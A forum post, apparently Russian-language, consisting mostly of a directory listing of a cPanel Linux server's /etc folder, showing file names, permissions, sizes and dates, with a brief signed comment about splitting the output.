drwxr-xr-x 4 root root 4096 Dec 8 2011 acpi
-rw-r--r-- 1 root root 46 Sep 18 22:07 adjtime
-rw-r--r-- 1 root root 1512 Apr 25 2005 aliases
drwxr-xr-x 4 root root 4096 Aug 22 05:52 alsa
drwxr-xr-x 2 root root 4096 Mar 30 2012 alternatives
-rw-r--r-- 1 root root 298 Jan 19 2011 anacrontab
-rw-r--r-- 1 root root 10634 Oct 25 18:57 antivirus.exim
-rw------- 1 root root 1 Jan 26 2010 at.deny
drwxr-x--- 3 root root 4096 Mar 21 2012 audisp
drwxr-x--- 2 root root 4096 Mar 21 2012 audit
-rw-r--r-- 1 root root 717 Apr 20 2012 auto.master
-rw-r--r-- 1 root root 581 Apr 20 2012 auto.misc
-rwxr-xr-x 1 root root 1292 Apr 20 2012 auto.net
-rwxr-xr-x 1 root root 742 Apr 20 2012 auto.smb
-rw------- 1 root root 3902 Apr 20 2012 autofs_ldap_auth.conf
drwxr-xr-x 4 root root 4096 Aug 22 05:52 avahi
-rw-r----- 1 root mail 50 Apr 27 2012 backupmxhosts
drwxr-xr-x 2 root root 4096 Aug 29 22:05 bash_completion.d
-rwxr-xr-x 1 root root 1702 Nov 10 2011 bashrc
-rw-r--r-- 1 root root 1872 Feb 28 2012 bashrc.rpmnew
-rw-r----- 1 root root 130343 Oct 31 10:24 bkup.mailips
drwxr-xr-x 2 root root 4096 Oct 29 22:30 blkid
-rw-r--r-- 1 root root 605 Jul 15 01:23 blkid.tab
-rw-r--r-- 1 root root 605 Jul 14 08:55 blkid.tab.old
drwxr-xr-x 2 root root 4096 Nov 28 2011 bluetooth
drwxr-xr-x 2 root root 4096 Aug 22 05:52 bonobo-activation
drwxr-xr-x 2 root root 4096 Nov 6 21:42 chkserv.d
drwxr-xr-x 2 root root 4096 Nov 28 2011 cl-convert-saved
-rw-r--r-- 1 root root 14949 Oct 24 13:12 clamd.conf
-rw-r--r-- 1 root root 6308 Nov 11 2007 conman.conf
drwxr-xr-x 2 root root 4096 Oct 4 05:53 container
-rw-r--r-- 1 root root 11435 May 1 2012 cpanel_exim_system_filter
-rw-r--r-- 1 root root 11470 Apr 4 2012 cpanel_exim_system_filter_custom
-rw-r--r-- 1 root root 0 Nov 6 21:42 cpanelsync.exclude
-rw-r--r-- 1 root root 38 Jul 16 23:08 cpanelsync.no_chmod
-rw-r--r-- 1 root root 138 Nov 25 2011 cpbackup-exclude.conf
-rw-r--r-- 1 root root 390 Nov 6 21:42 cpbackup.conf
-rw-r--r-- 1 root root 493 Nov 6 21:43 cpbackup.conf.cache
-rw-r--r-- 1 root root 52 Nov 6 21:42 cpbackup.public.conf
-rw-r--r-- 1 root root 208 Oct 24 11:21 cpupdate.conf
drwx------ 2 root root 4096 Oct 17 18:06 cron.d
drwxr-xr-x 2 root root 4096 Aug 30 05:54 cron.daily
-rw-r--r-- 1 root root 7 Nov 10 2011 cron.deny
drwxr-xr-x 2 root root 4096 Mar 22 2012 cron.hourly
drwxr-xr-x 2 root root 4096 Nov 28 2011 cron.monthly
drwxr-xr-x 2 root root 4096 Jun 6 05:52 cron.weekly
-rw-r--r-- 1 root root 255 Nov 28 2011 crontab
drw------- 11 root root 4096 Nov 7 06:00 csf
-rw-r--r-- 1 root root 1044 Feb 28 2012 csh.cshrc
-rw-r--r-- 1 root root 823 Feb 28 2012 csh.login
-rw-r----- 1 root mail 28936 Nov 7 05:55 dbowners
drwxr-xr-x 4 root root 4096 Nov 11 2011 dbus-1
drwxr-xr-x 2 root root 4096 Aug 28 05:54 default
-rw-r----- 1 root mail 0 Nov 7 05:55 demodomains
-rw-r----- 1 root root 206 Nov 15 2011 demodomains,v
-rw-r----- 1 root mail 0 Nov 7 05:55 demouids
-rw-r----- 1 root root 206 Nov 15 2011 demouids,v
-rw-r----- 1 root mail 0 Nov 7 05:55 demousers
drwxr-xr-x 2 root root 4096 Nov 11 2011 depmod.d
drwxr-xr-x 3 root root 4096 Nov 14 2011 dev.d
-rw-r--r-- 1 root root 178 Mar 6 2011 dhcp6c.conf
-rw-r----- 1 root root 1 Nov 6 20:09 digestshadow
-rw-r--r-- 1 root root 18484 Sep 1 2009 dnsmasq.conf
drwxr-xr-x 2 root root 4096 Sep 1 2009 dnsmasq.d
-rw-r--r-- 1 root root 0 Apr 4 2012 domain_keys_active
-rw-r--r-- 1 root root 1858 Nov 6 21:39 domainips
-rw-r----- 1 root mail 43831 Nov 7 05:55 domainusers
-r--r----- 1 root root 778732 Nov 6 20:09 domainusers,v
drwxr-xr-x 3 root root 4096 Nov 10 2011 dovecot
-rw-r--r-- 1 root root 32405 Nov 6 21:38 dovecot.conf
-rw-rw-r-- 1 root disk 0 Nov 29 2011 dumpdates
-rw-r----- 1 root mail 17502 Nov 7 05:55 email_send_limits
-rw-r----- 1 root wheel 7509 May 4 2012 email_send_limits,v
-rw-r--r-- 1 root root 0 Mar 7 2012 entropychatdisable
-rw-r--r-- 1 root root 0 Feb 28 2012 environment
-rw-r--r-- 1 root root 153 Mar 15 2012 esd.conf
drwxr-xr-x 3 root root 4096 Nov 10 2011 exim
-rw-r--r-- 1 root root 0 Nov 10 2011 exim.aclspam
-rw-r--r-- 1 root root 57897 Nov 6 21:38 exim.conf
-rw-r--r-- 1 root root 26408 Oct 25 18:57 exim.conf.dist
-rw-r--r-- 1 root root 476 May 1 2012 exim.conf.local
-rw-r--r-- 1 root root 1130 Nov 6 21:42 exim.conf.localopts
-rw-r--r-- 1 root root 29729 Oct 25 18:57 exim.conf.mailman2.dist
-rw-r--r-- 1 root root 29904 Oct 25 18:57 exim.conf.mailman2.exiscan.dist
lrwxrwxrwx 1 root root 31 Jan 19 2012 exim.crt -> /var/cpanel/ssl/exim/myexim.crt
lrwxrwxrwx 1 root root 31 Jan 19 2012 exim.key -> /var/cpanel/ssl/exim/myexim.key
-rw-r--r-- 1 root root 26257 Nov 6 21:38 exim.pl
-rwxr-xr-x 1 root root 61647 Nov 6 21:38 exim.pl.local
-rw-r--r-- 1 root root 24 Apr 5 2012 exim_trusted_configs
-rw-r--r-- 1 root root 10 Sep 19 19:54 eximmailtrap
-rw-r--r-- 1 root root 226 Nov 6 21:39 eximrejects
-rw-r--r-- 1 root root 0 Jan 12 2000 exports
-rw-r--r-- 1 root root 22060 Jan 7 2007 fb.modes
-rw-r--r-- 1 root root 59 Jan 31 2006 filesystems
drwxr-xr-x 2 root root 4096 Mar 21 2012 firmware
drwxr-xr-x 4 root root 4096 Nov 11 2011 fonts
-rw-r--r-- 1 root root 7775 Oct 24 13:12 freshclam.conf
-rw-r--r-- 1 root root 632 Sep 29 22:28 fstab
-rw-r--r-- 1 root root 1080 Nov 14 2011 fstab,v
-rw-r--r-- 1 root root 624 Jul 26 19:53 fstab.quotas
lrwxrwxrwx 1 root root 38 Jan 19 2012 ftpd-rsa-key.pem -> /var/cpanel/ssl/ftp/myftpd-rsa-key.pem
lrwxrwxrwx 1 root root 34 Jan 19 2012 ftpd-rsa.pem -> /var/cpanel/ssl/ftp/myftpd-rsa.pem
drwxr-xr-x 6 root root 4096 Nov 11 2011 gconf
drwxr-xr-x 2 root root 4096 Apr 17 2012 gcrypt
drwxr-xr-x 2 root root 4096 Sep 12 09:13 ghostscript
drwxr-xr-x 3 root root 4096 Aug 22 05:53 gnome-vfs-2.0
-rw-r--r-- 1 root root 10793 Sep 18 2009 gnome-vfs-mime-magic
-rw-r--r-- 1 root root 1756 Jan 6 2007 gpm-root.conf
-rw-r--r-- 1 root root 27490 Nov 6 20:09 group
-r--r--r-- 1 root root 70959 Oct 22 19:18 group,v
-rw------- 1 root root 27507 Nov 6 20:08 group-
lrwxrwxrwx 1 root root 22 Nov 11 2011 grub.conf -> ../boot/grub/grub.conf
-rw------- 1 root root 20997 Nov 6 20:09 gshadow
-r-------- 1 root root 58417 Oct 22 19:18 gshadow,v
-rw------- 1 root root 21010 Nov 6 20:08 gshadow-
-rw-r--r-- 1 root root 833 Mar 14 2007 gssapi_mech.conf
drwxr-xr-x 4 root root 4096 Dec 8 2011 gtk-2.0
drwxr-xr-x 3 root root 4096 Mar 6 2011 hal
-rw-r--r-- 1 root root 0 Feb 28 2012 host.conf
-rw-r--r-- 1 root root 245 Nov 7 05:56 hosts
-rw-r--r-- 1 root root 161 Jan 12 2000 hosts.allow
-rw-r--r-- 1 root root 165 Feb 28 2012 hosts.deny
lrwxrwxrwx 1 root root 17 Nov 10 2011 httpd -> /usr/local/apache
-rw-r--r-- 1 root root 3579 Mar 15 2012 idmapd.conf
lrwxrwxrwx 1 root root 11 Nov 11 2011 init.d -> rc.d/init.d
-rw-r--r-- 1 root root 658 Aug 9 12:04 initlog.conf
-rw-r--r-- 1 root root 1666 Aug 9 12:04 inittab
-rw-r--r-- 1 root root 758 Sep 23 2004 inputrc
-rw-r--r-- 1 root root 0 Nov 22 2011 interchangedisable
-rw-r--r-- 1 root root 14 Nov 7 12:45 ipaddrpool
-rw-r--r-- 1 root root 82 Jul 15 07:42 ipaddrpool-
drwxr-xr-x 2 root root 4096 Aug 10 05:53 iproute2
-rw-r--r-- 1 root root 2513 Oct 29 23:16 ips
-rw-r--r-- 1 root wheel 2682 Nov 7 13:25 ips.dnsmaster
drwxr-xr-x 2 root root 4096 Mar 21 2012 iscsi
-rw-r--r-- 1 root root 50 Oct 2 14:03 issue
-rw-r--r-- 1 root root 49 Oct 2 14:03 issue.net
-rw-r--r-- 1 root root 604 Nov 10 2011 issue.net.rpmsave
-rw-r--r-- 1 root root 603 Nov 10 2011 issue.rpmsave
-rw-r--r-- 1 root root 32016 May 4 2011 jwhois.conf
-rw-r--r-- 1 root root 608 Jun 25 2007 krb5.conf
-rw-r--r-- 1 root root 56605 Oct 18 05:52 ld.so.cache
-rw-r--r-- 1 root root 28 Oct 8 2006 ld.so.conf
drwxr-xr-x 2 root root 4096 Aug 27 13:38 ld.so.conf.d
-rw-r--r-- 1 root root 9111 Nov 11 2011 ldap.conf
-rw-r--r-- 1 root root 3544 Dec 5 2011 lftp.conf
-rw-r----- 1 root root 191 Oct 27 2011 libaudit.conf
-rw-r--r-- 1 root root 2506 Aug 7 10:16 libuser.conf
-rw-r--r-- 1 root root 0 Oct 25 18:57 localaliases
-rw-r----- 1 root mail 71858 Nov 7 13:26 localdomains
-rw-r----- 1 root root 1516656 Nov 6 20:09 localdomains,v
-rw-r--r-- 1 root root 118 Apr 20 2012 localtime
-rw-r--r-- 1 root root 1522 Nov 11 2011 login.defs
-rw-r--r-- 1 root root 619 Jun 6 08:57 logrotate.conf
drwxr-xr-x 2 root root 4096 Oct 27 06:11 logrotate.d
drwxr-xr-x 4 root root 4096 Aug 29 12:11 logwatch
drwxr-xr-x 2 root root 4096 Nov 28 2011 lsb-release.d
drwxr-xr-x 5 root root 4096 Mar 21 2012 lvm
-rw-r--r-- 1 root root 66 Oct 27 2008 lynx-site.cfg
-rw-r--r-- 1 root root 140191 Oct 27 2008 lynx.cfg
drwxr-xr-x 3 root root 4096 Nov 10 2011 mail
-rw-r--r-- 1 root root 112 Jan 7 2007 mail.rc
-rw-r----- 1 root mail 42 Nov 7 05:55 mail_reverse_dns
-rw-r--r-- 1 root root 293 Jan 7 2007 mailcap
-rw-r----- 1 root mail 0 Nov 7 05:55 mailhelo
-rw-r----- 1 root mail 130343 Oct 31 10:24 mailips
-rw-r----- 1 root root 130350 Oct 30 09:24 mailips~
drwxr-xr-x 3 root root 4096 Nov 10 2011 mailproviders
drwxr-xr-x 2 root root 4096 Nov 11 2011 makedev.d
-rw-r--r-- 1 root root 4617 May 30 12:11 man.config
-rwxr-xr-x 1 root root 2242 May 18 2011 mcelog.conf
-rw-r--r-- 1 root root 10 Apr 3 2012 melangedisable
drwxr-xr-x 2 root root 4096 Nov 11 2011 mgetty+sendfax
-rw-r--r-- 1 root root 14100 Jan 7 2007 mime.types
-rw-r--r-- 1 root root 330 Jun 20 09:21 mke2fs.conf
-rw-r--r-- 1 root root 96 Nov 11 2011 modprobe.conf
drwxr-xr-x 2 root root 4096 Sep 18 09:21 modprobe.d
-rw-r--r-- 1 root root 0 Jan 12 2000 motd
-rw-r--r-- 1 root root 0 Nov 6 21:38 mta_dkim_active
-rw-r--r-- 1 root root 391 Sep 29 22:28 mtab
-rw-r--r-- 1 root root 1983 Jan 6 2007 mtools.conf
-rw-r--r-- 1 root root 2706 Apr 2 2012 multipath.conf
-rw-r--r-- 1 root root 740 Sep 19 19:54 my.cnf
-rw-r----- 1 root named 1230 Oct 15 08:41 named.caching-nameserver.conf
-rw-r----- 1 named named 6665955 Nov 7 13:25 named.conf
-rw-r----- 1 root root 20859452 Nov 6 20:24 named.conf,v
-rw-r----- 1 root named 836251 Nov 7 13:25 named.conf.cache
-rw-r----- 1 root named 547372 Dec 28 2011 named.conf.precleandns
-rw-r----- 1 root named 3947575 Jul 17 08:33 named.conf.prerebuilddnsconfig
-rw-r----- 1 root named 3947550 Jul 17 08:33 named.conf.rebuilddnsconfig
-rw-r----- 1 root named 62 Nov 7 13:25 named.conf.zonedir.cache
-rw-r----- 1 root named 955 Oct 15 08:41 named.rfc1912.zones
-rw-r--r-- 1 root root 2149 Apr 16 2012 nameserverips
drwxr-xr-x 2 root root 4096 Mar 21 2012 netplug
drwxr-xr-x 2 root root 4096 Mar 21 2012 netplug.d
-rw-r----- 1 root mail 2487 Nov 7 05:55 nocgiusers
-rw-r----- 1 root root 38962 Nov 6 00:05 nocgiusers,v
-rw-r--r-- 1 root root 1895 Aug 27 13:13 nscd.conf
drwxr-xr-x 2 named named 4096 Oct 19 00:41 nsd
Код:
-rw-r--r-- 1 root root 1717 Aug 9 05:52 nsswitch.conf
drwxr-xr-x 2 root root 4096 Nov 28 2011 oddjob
-rw-r--r-- 1 root root 4461 Jul 19 2006 oddjobd.conf
drwxr-xr-x 2 root root 4096 Nov 30 2011 oddjobd.conf.d
-rw-r--r-- 1 root root 65 Feb 16 2012 oldscriptfinder-cpanelplugin.conf
drwxr-xr-x 3 root root 4096 Jul 12 11:34 openldap
drwxr-xr-x 2 root root 4096 May 11 2011 opt
drwxr-xr-x 2 root root 4096 Nov 6 21:39 pam.d
drwxr-xr-x 2 root root 4096 Mar 21 2012 pam_pkcs11
-rw-r--r-- 1 root root 12 Jan 6 2007 pam_smb.conf
drwxr-xr-x 4 root root 4096 Nov 28 2011 pango
-rw-r--r-- 1 root root 107061 Nov 6 20:09 passwd
-rw-r--r-- 1 root root 625624 Nov 6 20:09 passwd,v
-rw-r--r-- 1 root root 107112 Nov 6 20:09 passwd-
-rw-r--r-- 1 root root 107128 Nov 6 20:08 passwd.OLD
-rw------- 1 root root 297168 Nov 6 20:09 passwd.cache
-rw------- 1 root root 271048 Nov 6 20:09 passwd.nouids.cache
drwxr-xr-x 2 root root 4096 Nov 11 2011 pcmcia
-rw-r--r-- 1 root root 2875 Jan 7 2007 pinforc
drwxr-xr-x 8 root root 4096 Nov 10 2011 pki
drwxr-xr-x 5 root root 4096 Aug 8 05:52 pm
-rw------- 1 root wheel 94 Oct 22 19:18 portassignments
drwxr-xr-x 3 root root 4096 Aug 10 05:53 ppp
-rw-r--r-- 1 root root 189900 Nov 7 05:16 prelink.cache
-rw-r--r-- 1 root root 973 Sep 18 2008 prelink.conf
drwxr-xr-x 2 root root 4096 Jan 21 2009 prelink.conf.d
-rw-r--r-- 1 root root 233 Mar 25 2004 printcap
-rw-r--r-- 1 root root 1262 Nov 10 2011 profile
drwxr-xr-x 2 root root 4096 Aug 10 05:53 profile.d
-rw-r--r-- 1 root root 1344 Feb 28 2012 profile.rpmnew
drwxr-x--x 2 root root 106496 Nov 7 13:26 proftpd
drwxr-xr-x 2 root root 4096 Dec 28 2011 prospamfilter
-rw-r--r-- 1 root root 6108 Oct 11 2006 protocols
drwxr-xr-x 2 root root 4096 Nov 6 21:39 pure-ftpd
-rw-r--r-- 1 root root 10709 Sep 5 21:51 pure-ftpd.conf
-rw-r--r-- 1 root root 11181 Dec 9 2011 pure-ftpd.conf.rpmnew
lrwxrwxrwx 1 root root 33 Jan 19 2012 pure-ftpd.pem -> /var/cpanel/ssl/ftp/pure-ftpd.pem
-rw------- 1 root root 84 Nov 28 2011 pureftpd.passwd
-rw------- 1 root root 2150 Nov 28 2011 pureftpd.pdb
-rw------- 1 root root 21186 Nov 6 21:35 quota.conf
-rw------- 1 root root 467653 Nov 6 20:09 quota.conf,v
-rw-r--r-- 1 root root 220 May 4 2011 quotagrpadmins
-rw-r--r-- 1 root root 290 May 4 2011 quotatab
drwxr-xr-x 3 root root 4096 Sep 12 05:54 racoon
lrwxrwxrwx 1 root root 7 Aug 10 05:53 rc -> rc.d/rc
drwxr-xr-x 10 root root 4096 Nov 6 21:40 rc.d
lrwxrwxrwx 1 root root 13 Aug 10 05:53 rc.local -> rc.d/rc.local
lrwxrwxrwx 1 root root 15 Aug 10 05:53 rc.sysinit -> rc.d/rc.sysinit
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc0.d -> rc.d/rc0.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc1.d -> rc.d/rc1.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc2.d -> rc.d/rc2.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc3.d -> rc.d/rc3.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc4.d -> rc.d/rc4.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc5.d -> rc.d/rc5.d
lrwxrwxrwx 1 root root 10 Aug 10 05:53 rc6.d -> rc.d/rc6.d
drwxr-xr-x 2 root root 4096 Nov 11 2011 readahead.d
-rw-r--r-- 1 root root 435 Sep 18 22:09 reader.conf
drwxr-xr-x 2 root root 4096 Nov 11 2011 reader.conf.d
drwxr-xr-x 2 root root 4096 Nov 28 2011 redhat-lsb
-rw-r--r-- 1 root root 30 Oct 2 14:03 redhat-release
-rw-r--r-- 1 root root 3105 Nov 7 14:01 relayhosts
-rw-r--r-- 1 root root 14796 Nov 7 14:01 relayhostsusers
-rw-r----- 1 root mail 6028 Nov 6 20:09 remotedomains
-rw-r----- 1 root root 130191 Nov 6 20:08 remotedomains,v
-rw-r--r-- 1 root root 1484 Jan 6 2007 request-key.conf
-rw-r--r-- 1 root root 29 Apr 16 2012 reservedipreasons
-rw-r--r-- 1 root root 14 Apr 16 2012 reservedips
-rw-r--r-- 1 root root 38 Apr 20 2012 resolv.conf
lrwxrwxrwx 1 root root 11 Nov 30 2011 rmt -> ../sbin/rmt
-rw-r----- 1 named named 479 Jul 17 08:20 rndc.conf
-rw-rw---- 1 named named 77 Jul 17 08:20 rndc.key
-rw-r--r-- 1 root root 1615 Aug 30 2001 rpc
drwxr-xr-x 2 root root 4096 Oct 3 05:55 rpm
-rw-r--r-- 1 root root 754 Aug 9 12:04 rwtab
drwxr-xr-x 2 root root 4096 Aug 9 12:04 rwtab.d
drwxr-xr-x 2 root root 4096 Sep 4 15:17 sasl2
-rw-r--r-- 1 root root 6972 May 4 2011 screenrc
-rw-r--r-- 1 root root 666 Nov 14 2011 scsi_id.config
-rw-r----- 1 root mail 794 Nov 6 20:09 secondarymx
-rw-r----- 1 root root 18470 Nov 6 18:41 secondarymx,v
-rw------- 1 root root 122 Feb 17 2003 securetty
drwxr-xr-x 5 root root 4096 Nov 28 2011 security
drwxr-xr-x 3 root root 4096 Nov 6 21:35 selinux
-rw-r----- 1 root mail 0 Nov 10 2011 senderverifybypasshosts
-rw-r--r-- 1 root root 85179 Mar 31 2010 sensors.conf
-rw-r--r-- 1 root root 362031 Feb 23 2006 services
-rw-r--r-- 1 root root 216 Apr 3 2010 sestatus.conf
drwxr-xr-x 2 root root 4096 Nov 11 2011 setuptool.d
-rw------- 1 root root 101055 Nov 6 20:09 shadow
-rw------- 1 root root 726760 Nov 6 20:09 shadow,v
-rw------- 1 root root 101120 Nov 6 20:09 shadow-
-rw------- 1 root root 369665 Nov 6 20:10 shadow.nouids.cache
-rw-r--r-- 1 root root 133 Nov 10 2011 shells
drwxr-xr-x 2 root root 4096 Nov 11 2011 skel
-rw-r----- 1 root mail 52 Apr 27 2012 skipsmtpcheckhosts
-rw-r--r-- 1 root root 6463 Dec 8 2011 smartd.conf
drwxr-xr-x 2 root root 4096 May 21 11:25 snmp
drwxr-xr-x 3 root root 4096 Aug 22 05:53 sound
-rw-r----- 1 root mail 0 Nov 10 2011 spammeripblocks
-rw-r--r-- 1 root root 0 Oct 25 18:57 spammers
drwxr-xr-x 2 root root 4096 Mar 17 2012 ssh
drwxr-xr-x 4 root root 4096 Nov 10 2011 ssl
-rw------- 1 root root 2533 Nov 1 10:43 ssldomains
-rw-r--r-- 1 root root 74 Jul 16 23:09 stats.conf
drwxr-xr-x 2 root root 4096 Mar 11 2009 stunnel
-r--r----- 1 root root 3381 Sep 17 08:14 sudoers
drwxr-xr-x 10 root root 4096 Nov 7 13:57 sysconfig
-rw-r--r-- 1 root root 1030 Aug 12 19:30 sysctl.conf
-rw-r--r-- 1 root root 694 Apr 3 2010 syslog.conf
-rw------- 1 root root 6411 May 25 2008 tcsd.conf
-rw-r--r-- 1 root root 807103 Jan 6 2007 termcap
-rw-r----- 1 root mail 43831 Nov 7 05:55 trueuserdomains
-r--r----- 1 root root 778732 Nov 6 20:09 trueuserdomains,v
-rw-r--r-- 1 root mail 28688 Nov 7 05:55 trueuserowners
-r--r--r-- 1 root root 449643 Nov 6 20:09 trueuserowners,v
-rw-r----- 1 root mail 0 Nov 6 21:38 trustedmailhosts
drwxr-xr-x 4 root root 4096 Nov 15 2011 udev
-rw-r--r-- 1 root root 136 Sep 3 2009 updatedb.conf
drwxr-x--- 2 root adm 4096 Oct 17 18:06 uptrack
-rw-r----- 1 root mail 33678 Nov 7 05:55 userbwlimits
-r--r----- 1 root root 530039 Nov 6 20:09 userbwlimits,v
-rw------- 1 root mail 441132 Nov 7 13:26 userdatadomains
-rw------- 1 root root 474560 Nov 7 13:27 userdatadomains.stor
-rw-r----- 1 root mail 110184 Nov 7 13:26 userdomains
-rw-r----- 1 root root 1530746 Nov 6 20:09 userdomains,v
-rw-r----- 1 root mail 44202 Nov 7 05:55 userplans
-r--r----- 1 root root 525127 Nov 6 20:09 userplans,v
drwx--x--x 2 root root 192512 Nov 7 13:26 valiases
drwx--x--x 2 root root 192512 Nov 7 13:26 vdomainaliases
drwx--x--x 2 root root 204800 Nov 7 13:26 vfilters
lrwxrwxrwx 1 root root 7 Nov 10 2011 vftp -> proftpd
-rw-r--r-- 1 root root 1533 Mar 6 2011 virc
drwxr-xr-x 2 root root 4096 Nov 25 2011 vmware
-rw-r--r-- 1 root root 2657 May 4 2011 warnquota.conf
-rw-r--r-- 1 root root 10 Sep 19 19:54 webspam
-rw-r--r-- 1 root root 4204 May 10 11:36 wgetrc
drwxr-xr-x 2 root root 4096 Nov 11 2011 wpa_supplicant
-rw-r--r-- 1 root root 336 Apr 16 2012 wwwacct.conf
-rw-r--r-- 1 root root 505 Apr 16 2012 wwwacct.conf.cache
-rw------- 1 root root 60 Apr 16 2012 wwwacct.conf.shadow
-rw------- 1 root root 511 Apr 16 2012 wwwacct.conf.shadow.cache
drwxr-xr-x 4 root root 4096 Nov 11 2011 xdg
drwxr-xr-x 2 root root 4096 Mar 17 2012 xinetd.d
-rw-r--r-- 1 root root 585 Jun 30 2011 yp.conf
drwxr-xr-x 3 root root 4096 Jul 26 10:09 yum
-rw-r--r-- 1 root root 637 Nov 7 05:52 yum.conf
-rw-r--r-- 1 root root 346 Aug 15 2011 yum.conf.rpmnew
drwxr-xr-x 2 root root 4096 Oct 3 05:55 yum.repos.d
// Потому что много "букаф"
// в code. Разбил на 2 части.
// BigBear
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|